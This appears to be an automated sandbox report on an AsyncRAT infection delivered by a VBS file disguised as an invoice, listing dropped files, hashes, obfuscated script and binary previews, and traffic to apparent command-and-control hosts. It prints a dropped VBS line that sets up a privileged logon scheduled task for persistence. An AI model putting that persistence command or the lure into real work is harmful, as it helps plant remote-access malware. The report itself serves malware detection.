                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                            C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CR, LF line terminators
                                            Category:dropped
                                            Size (bytes):221
                                            Entropy (8bit):4.520339522389818
                                            Encrypted:false
                                            SSDEEP:3:jmSGFEm8nsFy0ijQLHBD/uOuG+rBTNAW23e6wDnoNN+EaKC5eiFpFVLjN:jaNqsE61/u5FBzk/wjoNN7aZ5e6/
                                            MD5:13B68193AE7BF8E04468F23B2F878751
                                            SHA1:FBCB57D90B7ADFEB963E54ED0000610B6F88B939
                                            SHA-256:97931461E7E1E8D01E0045A33E823D4B25AB89A7FC2BDD2A6BC79FE45DCF34C4
                                            SHA-512:598E9805A89BB3CD386554C8A946EC28217B781DDA76106E4B45304EAC3FCDA1EE858CDCBB3D64E3F4A46F17B5EBE6AE72096921FEADF4190B1C65D6B03A8E14
                                            Malicious:true
                                            Preview: Set wshShell = CreateObject("WScript.Shell") ..ret = wshShell.Run ("schtasks /create /sc onlogon /rl highest /tn Notepads.exe /tr ""C:\Users\user\AppData\Roaming\Notepads.exe", 0, False)
                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8
                                            Entropy (8bit):3.0
                                            Encrypted:false
                                            SSDEEP:3:Iq8:Iq8
                                            MD5:CC22F0048AEA8CDC7CFBCF7E10818E98
                                            SHA1:D27C83B167C3FAA39B8B9D10ECDB01D244D18A55
                                            SHA-256:35A0A75FA2AC5DF4A72BC15E1C68536D4B09C9EFB506BC3CF8CF33AD207AAAC1
                                            SHA-512:DCEA6835062629A748B948870ED47A5BF6F6E245A654D44E3240B9F0BCC20D1EF33BA417F66CE8FB2608342D1F89B5C2796FA521A95EC7B0D718333D4F95F2CF
                                            Malicious:true
                                            Preview: .W..j..H
                                            C:\Users\user\AppData\Roaming\Notepads.exe
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........."...0.................. ........@.. .......................@............@.....................................K.......v.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...v...........................@..@.reloc....... ......................@..B........................H............'............................................................/.\......V..;...$0.xC.=VD..b......9A..{....*..{....*..{ ...*r.(!.....}......}......} ...*..(!...*..{....*"..}....*..{....*...}......sH...}......sL...}....*f.(!.....(.....s!...(....*..{....*"..}....*j.(!.....sH...}......((...*..{....*"..}....*..*..*..{....*"..}....*v..(......2.s>...(?.....}'...*V..P.{)....{*...or...*..,......ioI......{,....{-...or...*.~....*.......*.~/...*.../...*.~0...*...0...*.~1...*

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines, with CRLF line terminators
                                            Entropy (8bit):5.625953655922885
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:Invoice No F1019855_PDF.vbs
                                            File size:498648
                                            MD5:ce4dcec84bfeba49404fa70f5d137645
                                            SHA1:c31021953c59af126d0095bea70c26ca02a2d954
                                            SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
                                            SHA512:206f93128c63f78891cd55aff0a2ffe74696845df2f1d2a359bd569716f2a8a7d68c9b12c724c3b5e35963664eba8ce41d8eb65c54f5f36d256fb850635e7b01
                                            SSDEEP:12288:hpwkVfVJwJJTtAm+7Jx1zCBEDiBsrvODJ2+oDhX+K2jid:/wkVfsJoz8srvOXoZdMid
                                            File Content Preview:on error resume next..Dim gTzLXUWzCBikJZhvnBenaiztweMohtxHSfLxABGzBuMkSVcBIAEZctzxUFPtIhRIDbRdOkvmvemfWPbaCKghoYeYgNculNrTdDgqDynYESexHTbFdpqxBjTfwtxAHAAhnSCSikWDXIdVuhRMmXRvWuSujBuKBmQDSwKpRJWsTmZtGykPbkOkjELsAIihqLClrZDyWcvcAYc..'jUYnlQfiRYgTNkRoIapCHko

                                            File Icon

                                            Icon Hash:e8d69ece869a9ec4

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/04/21-19:09:41.909556ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:41.947594ICMP449ICMP Time-To-Live Exceeded in Transit84.17.52.126192.168.2.6
                                            05/04/21-19:09:41.948113ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:41.983261ICMP449ICMP Time-To-Live Exceeded in Transit5.56.20.161192.168.2.6
                                            05/04/21-19:09:41.983749ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.024316ICMP449ICMP Time-To-Live Exceeded in Transit81.95.15.57192.168.2.6
                                            05/04/21-19:09:42.024859ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.066114ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.202192.168.2.6
                                            05/04/21-19:09:42.066597ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.125981ICMP449ICMP Time-To-Live Exceeded in Transit152.195.101.129192.168.2.6
                                            05/04/21-19:09:42.126280ICMP384ICMP PING192.168.2.693.184.221.240
                                            05/04/21-19:09:42.166881ICMP408ICMP Echo Reply93.184.221.240192.168.2.6
                                            05/04/21-19:09:51.927237ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                            05/04/21-19:09:52.614087ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                            05/04/21-19:09:53.652130ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 19:09:51.665118933 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:51.869891882 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:52.529974937 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:52.750188112 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:53.326894045 CEST4971611940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:53.539463997 CEST119404971679.137.109.121192.168.2.6
                                            May 4, 2021 19:09:57.936311960 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:09:58.249712944 CEST119404972079.137.109.121192.168.2.6
                                            May 4, 2021 19:09:58.764899015 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:04.781049967 CEST4972011940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:05.049330950 CEST119404972079.137.109.121192.168.2.6
                                            May 4, 2021 19:10:09.318511963 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:09.537698030 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:10.047120094 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:10.330120087 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:10.843995094 CEST4972111940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:11.079242945 CEST119404972179.137.109.121192.168.2.6
                                            May 4, 2021 19:10:15.182888031 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:15.367213964 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:15.875750065 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:16.059684038 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:16.656979084 CEST4972511940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:16.840795040 CEST1194049725191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:20.893501997 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:21.077951908 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:21.610613108 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:21.794799089 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:22.313693047 CEST4972611940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:22.497848988 CEST1194049726191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:26.502759933 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:26.686959982 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:27.189443111 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:27.375371933 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:27.876647949 CEST4972711940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:28.060919046 CEST1194049727191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:32.288645029 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:32.490320921 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:33.048998117 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:33.359824896 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:33.939697027 CEST4972911940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:34.280600071 CEST119404972979.137.109.121192.168.2.6
                                            May 4, 2021 19:10:38.389955997 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:38.623215914 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:39.127610922 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:39.383506060 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:39.893307924 CEST4973511940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:40.281352997 CEST119404973579.137.109.121192.168.2.6
                                            May 4, 2021 19:10:44.478796005 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:44.762293100 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:45.268805027 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:45.514317036 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:46.034485102 CEST4974211940192.168.2.679.137.109.121
                                            May 4, 2021 19:10:46.274096966 CEST119404974279.137.109.121192.168.2.6
                                            May 4, 2021 19:10:50.286705017 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:50.470845938 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:50.972688913 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:51.156806946 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:51.659928083 CEST4974811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:51.844125032 CEST1194049748191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:55.852686882 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:56.036375999 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:56.551004887 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:56.734479904 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:10:57.239084005 CEST4974911940192.168.2.6191.96.25.26
                                            May 4, 2021 19:10:57.422533035 CEST1194049749191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:01.428244114 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:01.614038944 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:02.114063978 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:02.298418999 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:02.801588058 CEST4975011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:02.986004114 CEST1194049750191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:07.115073919 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:07.517537117 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:08.023256063 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:08.302828074 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:08.817667961 CEST4975111940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:09.164896011 CEST119404975179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:13.284063101 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:13.512885094 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:14.021348000 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:14.275142908 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:14.787311077 CEST4975411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:15.019846916 CEST119404975479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:19.257008076 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:19.520687103 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:20.021739006 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:20.341989040 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:20.849893093 CEST4975611940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:21.053107977 CEST119404975679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:25.972309113 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:26.156596899 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:26.709850073 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:26.894299984 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:27.413050890 CEST4975811940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:27.596800089 CEST1194049758191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:31.610606909 CEST4976011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:31.794442892 CEST1194049760191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:32.322751045 CEST4976011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:32.506926060 CEST1194049760191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:33.009179115 CEST4976011940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:33.192888021 CEST1194049760191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:34.142952919 CEST4976110090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:34.482829094 CEST100904976179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:35.000905991 CEST4976110090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:35.229201078 CEST100904976179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:35.735208988 CEST4976110090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:36.068960905 CEST100904976179.137.109.121192.168.2.6
                                            May 4, 2021 19:11:37.218229055 CEST4976211940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:37.402374029 CEST1194049762191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:37.907413006 CEST4976211940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:38.091662884 CEST1194049762191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:38.594826937 CEST4976211940192.168.2.6191.96.25.26
                                            May 4, 2021 19:11:38.779647112 CEST1194049762191.96.25.26192.168.2.6
                                            May 4, 2021 19:11:39.479207039 CEST4976310090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:39.770556927 CEST100904976379.137.109.121192.168.2.6
                                            May 4, 2021 19:11:40.282569885 CEST4976310090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:40.564403057 CEST100904976379.137.109.121192.168.2.6
                                            May 4, 2021 19:11:41.080710888 CEST4976310090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:41.408691883 CEST100904976379.137.109.121192.168.2.6
                                            May 4, 2021 19:11:43.118627071 CEST4976411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:43.350713015 CEST119404976479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:43.860968113 CEST4976411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:44.071643114 CEST119404976479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:44.579826117 CEST4976411940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:44.845026016 CEST119404976479.137.109.121192.168.2.6
                                            May 4, 2021 19:11:44.887248993 CEST4976510090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:45.144272089 CEST100904976579.137.109.121192.168.2.6
                                            May 4, 2021 19:11:45.751771927 CEST4976510090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:46.039201975 CEST100904976579.137.109.121192.168.2.6
                                            May 4, 2021 19:11:46.642581940 CEST4976510090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:46.936428070 CEST100904976579.137.109.121192.168.2.6
                                            May 4, 2021 19:11:52.723701954 CEST4976610090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:52.986839056 CEST100904976679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:52.998437881 CEST4976711940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:53.246498108 CEST119404976779.137.109.121192.168.2.6
                                            May 4, 2021 19:11:53.486722946 CEST4976610090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:53.693548918 CEST100904976679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:53.752391100 CEST4976711940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:54.138947010 CEST119404976779.137.109.121192.168.2.6
                                            May 4, 2021 19:11:54.205662966 CEST4976610090192.168.2.679.137.109.121
                                            May 4, 2021 19:11:54.441185951 CEST100904976679.137.109.121192.168.2.6
                                            May 4, 2021 19:11:54.643189907 CEST4976711940192.168.2.679.137.109.121
                                            May 4, 2021 19:11:54.866731882 CEST119404976779.137.109.121192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 4, 2021 19:09:35.166640043 CEST5451353192.168.2.68.8.8.8
                                            May 4, 2021 19:09:35.226166964 CEST53545138.8.8.8192.168.2.6
                                            May 4, 2021 19:09:36.041585922 CEST6204453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:36.066652060 CEST6379153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:36.090827942 CEST53620448.8.8.8192.168.2.6
                                            May 4, 2021 19:09:36.130598068 CEST53637918.8.8.8192.168.2.6
                                            May 4, 2021 19:09:37.244179010 CEST6426753192.168.2.68.8.8.8
                                            May 4, 2021 19:09:37.292851925 CEST53642678.8.8.8192.168.2.6
                                            May 4, 2021 19:09:38.124545097 CEST4944853192.168.2.68.8.8.8
                                            May 4, 2021 19:09:38.173890114 CEST53494488.8.8.8192.168.2.6
                                            May 4, 2021 19:09:39.295962095 CEST6034253192.168.2.68.8.8.8
                                            May 4, 2021 19:09:39.347642899 CEST53603428.8.8.8192.168.2.6
                                            May 4, 2021 19:09:40.401742935 CEST6134653192.168.2.68.8.8.8
                                            May 4, 2021 19:09:40.451777935 CEST53613468.8.8.8192.168.2.6
                                            May 4, 2021 19:09:41.416285992 CEST5177453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:41.467761993 CEST53517748.8.8.8192.168.2.6
                                            May 4, 2021 19:09:41.859519005 CEST5602353192.168.2.68.8.8.8
                                            May 4, 2021 19:09:41.908530951 CEST53560238.8.8.8192.168.2.6
                                            May 4, 2021 19:09:42.248583078 CEST5838453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:42.300246954 CEST53583848.8.8.8192.168.2.6
                                            May 4, 2021 19:09:43.165975094 CEST6026153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:43.220256090 CEST53602618.8.8.8192.168.2.6
                                            May 4, 2021 19:09:45.722426891 CEST5606153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:45.772176027 CEST53560618.8.8.8192.168.2.6
                                            May 4, 2021 19:09:46.677294970 CEST5833653192.168.2.68.8.8.8
                                            May 4, 2021 19:09:46.734442949 CEST53583368.8.8.8192.168.2.6
                                            May 4, 2021 19:09:47.388607979 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.446315050 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.565787077 CEST5406453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:48.614599943 CEST53540648.8.8.8192.168.2.6
                                            May 4, 2021 19:09:49.476988077 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:49.713926077 CEST5281153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:49.765503883 CEST53528118.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.422622919 CEST5529953192.168.2.68.8.8.8
                                            May 4, 2021 19:09:51.474486113 CEST53552998.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.483484030 CEST5378153192.168.2.68.8.8.8
                                            May 4, 2021 19:09:51.643963099 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:51.927154064 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:52.382672071 CEST6374553192.168.2.68.8.8.8
                                            May 4, 2021 19:09:52.431269884 CEST53637458.8.8.8192.168.2.6
                                            May 4, 2021 19:09:52.613918066 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:53.393827915 CEST5005553192.168.2.68.8.8.8
                                            May 4, 2021 19:09:53.442527056 CEST53500558.8.8.8192.168.2.6
                                            May 4, 2021 19:09:53.652007103 CEST53537818.8.8.8192.168.2.6
                                            May 4, 2021 19:09:54.367537975 CEST6137453192.168.2.68.8.8.8
                                            May 4, 2021 19:09:54.416326046 CEST53613748.8.8.8192.168.2.6
                                            May 4, 2021 19:09:57.843883038 CEST5033953192.168.2.68.8.8.8
                                            May 4, 2021 19:09:57.901256084 CEST53503398.8.8.8192.168.2.6
                                            May 4, 2021 19:10:09.150386095 CEST6330753192.168.2.68.8.8.8
                                            May 4, 2021 19:10:09.302356005 CEST53633078.8.8.8192.168.2.6
                                            May 4, 2021 19:10:10.029165983 CEST4969453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:10.077960014 CEST53496948.8.8.8192.168.2.6
                                            May 4, 2021 19:10:14.043780088 CEST5498253192.168.2.68.8.8.8
                                            May 4, 2021 19:10:14.102976084 CEST53549828.8.8.8192.168.2.6
                                            May 4, 2021 19:10:30.211396933 CEST5001053192.168.2.68.8.8.8
                                            May 4, 2021 19:10:30.262897968 CEST53500108.8.8.8192.168.2.6
                                            May 4, 2021 19:10:32.124850988 CEST6371853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:32.284786940 CEST53637188.8.8.8192.168.2.6
                                            May 4, 2021 19:10:32.749340057 CEST6211653192.168.2.68.8.8.8
                                            May 4, 2021 19:10:32.874445915 CEST53621168.8.8.8192.168.2.6
                                            May 4, 2021 19:10:33.930727005 CEST6381653192.168.2.68.8.8.8
                                            May 4, 2021 19:10:34.048940897 CEST53638168.8.8.8192.168.2.6
                                            May 4, 2021 19:10:36.912386894 CEST5501453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:36.970125914 CEST53550148.8.8.8192.168.2.6
                                            May 4, 2021 19:10:37.764956951 CEST6220853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:37.832662106 CEST53622088.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.024754047 CEST5757453192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.135011911 CEST53575748.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.339664936 CEST5181853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.388328075 CEST53518188.8.8.8192.168.2.6
                                            May 4, 2021 19:10:38.754163027 CEST5662853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:38.814485073 CEST53566288.8.8.8192.168.2.6
                                            May 4, 2021 19:10:40.104118109 CEST6077853192.168.2.68.8.8.8
                                            May 4, 2021 19:10:40.152796984 CEST53607788.8.8.8192.168.2.6
                                            May 4, 2021 19:10:40.631432056 CEST5379953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:40.691595078 CEST53537998.8.8.8192.168.2.6
                                            May 4, 2021 19:10:41.433511972 CEST5468353192.168.2.68.8.8.8
                                            May 4, 2021 19:10:41.486386061 CEST53546838.8.8.8192.168.2.6
                                            May 4, 2021 19:10:43.340945005 CEST5932953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:43.398149967 CEST53593298.8.8.8192.168.2.6
                                            May 4, 2021 19:10:44.105753899 CEST6402153192.168.2.68.8.8.8
                                            May 4, 2021 19:10:44.166434050 CEST53640218.8.8.8192.168.2.6
                                            May 4, 2021 19:10:44.418627977 CEST5612953192.168.2.68.8.8.8
                                            May 4, 2021 19:10:44.475996017 CEST53561298.8.8.8192.168.2.6
                                            May 4, 2021 19:10:47.745666981 CEST5817753192.168.2.68.8.8.8
                                            May 4, 2021 19:10:47.806412935 CEST53581778.8.8.8192.168.2.6
                                            May 4, 2021 19:11:07.055581093 CEST5070053192.168.2.68.8.8.8
                                            May 4, 2021 19:11:07.113138914 CEST53507008.8.8.8192.168.2.6
                                            May 4, 2021 19:11:13.231501102 CEST5406953192.168.2.68.8.8.8
                                            May 4, 2021 19:11:13.282305002 CEST53540698.8.8.8192.168.2.6
                                            May 4, 2021 19:11:14.340991974 CEST6117853192.168.2.68.8.8.8
                                            May 4, 2021 19:11:14.398482084 CEST53611788.8.8.8192.168.2.6
                                            May 4, 2021 19:11:19.050941944 CEST5701753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:19.108181953 CEST53570178.8.8.8192.168.2.6
                                            May 4, 2021 19:11:19.917026997 CEST5632753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:19.966650009 CEST53563278.8.8.8192.168.2.6
                                            May 4, 2021 19:11:27.702534914 CEST5024353192.168.2.68.8.8.8
                                            May 4, 2021 19:11:27.774426937 CEST53502438.8.8.8192.168.2.6
                                            May 4, 2021 19:11:34.072407007 CEST6205553192.168.2.68.8.8.8
                                            May 4, 2021 19:11:34.134166002 CEST53620558.8.8.8192.168.2.6
                                            May 4, 2021 19:11:39.420672894 CEST6124953192.168.2.68.8.8.8
                                            May 4, 2021 19:11:39.478065014 CEST53612498.8.8.8192.168.2.6
                                            May 4, 2021 19:11:43.058330059 CEST6525253192.168.2.68.8.8.8
                                            May 4, 2021 19:11:43.115463972 CEST53652528.8.8.8192.168.2.6
                                            May 4, 2021 19:11:44.819533110 CEST6436753192.168.2.68.8.8.8
                                            May 4, 2021 19:11:44.879615068 CEST53643678.8.8.8192.168.2.6
                                            May 4, 2021 19:11:51.660826921 CEST5506653192.168.2.68.8.8.8
                                            May 4, 2021 19:11:51.930774927 CEST6021153192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.674628973 CEST5506653192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.723125935 CEST53550668.8.8.8192.168.2.6
                                            May 4, 2021 19:11:52.940547943 CEST6021153192.168.2.68.8.8.8
                                            May 4, 2021 19:11:52.997445107 CEST53602118.8.8.8192.168.2.6

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            May 4, 2021 19:09:51.927237034 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable
                                            May 4, 2021 19:09:52.614087105 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable
                                            May 4, 2021 19:09:53.652129889 CEST192.168.2.68.8.8.8d008(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 4, 2021 19:09:47.388607979 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:48.446315050 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
